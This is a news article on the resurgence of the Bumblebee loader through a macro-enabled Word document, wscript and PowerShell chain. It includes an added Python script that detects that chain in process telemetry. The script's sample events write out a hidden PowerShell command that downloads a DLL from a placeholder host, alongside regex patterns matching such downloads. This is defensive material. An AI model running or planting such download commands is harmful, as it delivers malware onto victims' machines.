The notorious Bumblebee loader has made a comeback in the threat landscape hive following a four-month hiatus, with a newly identified email campaign targeting thousands of organizations in the US. Initially appearing in March 2022, Bumblebee was utilized by numerous cybercriminal groups to distribute a variety of payloads including infostealers, banking Trojans, and post-compromise tools. However, it disappeared from researchers’ radar until its recent resurgence.
The Proofpoint Threat Research Team described the latest campaign in a recent blog post, detailing a wave of emails with the subject “Voicemail February” sent from “info@quarlesaa[.]com”. The emails contain malicious Microsoft OneDrive URLs that lead to a Word document purporting to come from the consumer electronics company Humane. The chain ultimately uses a PowerShell command to download and run a Bumblebee DLL, which then enables further malicious activity.
The loader's return is viewed as an indicator of a surge in cybercriminal activity this year following a lull during the winter months. It coincides with the reappearance of other actors, including post-exploitation operator TA582, the aviation- and aerospace-targeting actor TA2541, and the return of TA571 email campaigns delivering the DarkGate malware, among others.
Compared with previous Bumblebee campaigns, the recent one stands out for its use of VBA macro-enabled documents, a tactic that has become uncommon since Microsoft began blocking macros by default in 2022. The Word document uses macros to write a script into the Windows temporary directory and execute it with the “wscript” utility; that script then downloads and executes the next stage from a remote server.
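As an added example that is not part of Proofpoint's report or the original article, the chain just described can be hunted for in process-creation telemetry: an Office application launching a script host on a file under a temporary directory, followed by that script host launching PowerShell that fetches a DLL. The event shape is a constructed, simplified Sysmon Event ID 1 record, and the path patterns and sample events are assumptions.

```python
"""Hunt for the Word -> temp-dir script -> wscript -> PowerShell DLL download
chain in process-creation events. Added example, not Proofpoint's code; the
event shape, temp-dir paths and sample events are constructed assumptions."""
import re
from dataclasses import dataclass

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# A script sitting in a Windows temporary directory (assumed locations).
TEMP_SCRIPT = re.compile(
    r'(?:\\appdata\\local\\temp\\|\\windows\\temp\\)[^\s"]+\.(?:vbs|js|wsf|ps1)\b',
    re.IGNORECASE)
# PowerShell fetching something that ends in .dll, the chain's final stage.
PS_DOWNLOAD_DLL = re.compile(
    r"(?:downloadfile|downloadstring|invoke-webrequest|iwr)\b.*\.dll", re.IGNORECASE)

@dataclass(frozen=True)
class ProcEvent:
    parent_image: str   # full path of the parent process
    image: str          # full path of the new process
    command_line: str   # command line of the new process

def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def classify(ev: ProcEvent):
    """Return a detection label for one event, or None if nothing matched."""
    parent, image = basename(ev.parent_image), basename(ev.image)
    if parent in OFFICE_APPS and image in SCRIPT_HOSTS and TEMP_SCRIPT.search(ev.command_line):
        return "office_spawned_script_host_on_temp_script"
    if parent in SCRIPT_HOSTS and image == "powershell.exe" and PS_DOWNLOAD_DLL.search(ev.command_line):
        return "script_host_spawned_powershell_dll_download"
    return None

def scan(events):
    """Return (image, label) for every event that matches a stage of the chain."""
    return [(ev.image, label) for ev in events if (label := classify(ev))]

# Constructed sample telemetry: two chain stages plus one benign logon script.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
              r"C:\Windows\System32\wscript.exe",
              r'wscript.exe "C:\Users\alice\AppData\Local\Temp\update.vbs"'),
    ProcEvent(r"C:\Windows\System32\wscript.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell -w hidden -c (New-Object Net.WebClient).DownloadFile('http://example.invalid/a','C:\Windows\Temp\a.dll')"),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\wscript.exe",
              r'wscript.exe "C:\Scripts\logon.vbs"'),
]
```

Correlating the two labels on the same host within a short window, rather than alerting on either alone, keeps false positives from legitimate logon scripts low.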
The attack chains in previous Bumblebee campaigns were notably different: emails containing URLs that led to the download of a DLL, or HTML attachments that used HTML smuggling to drop a RAR file. Those campaigns also used zipped, password-protected VBS attachments or zipped LNK files to download and execute the loader, underscoring the versatility and adaptability of the actors behind Bumblebee.
Although the recent campaign has not been attributed to any tracked threat actor, Proofpoint published a list of indicators of compromise (IoCs) to aid threat hunting and urged organizations to watch for the hallmarks noted above. The researchers also emphasized basic security practices for limiting exposure to malicious email campaigns, such as training employees to recognize phishing and deploying email security scanning that flags suspicious messages.
In conclusion, the resurgence of the Bumblebee loader, along with other malicious groups, marks a concerning increase in cybercriminal threat activity in 2024. The rapid evolution of attack strategies and the adaptability of these threat actors emphasize the need for organizations to remain vigilant and proactive in defending against these persistent and sophisticated threats.
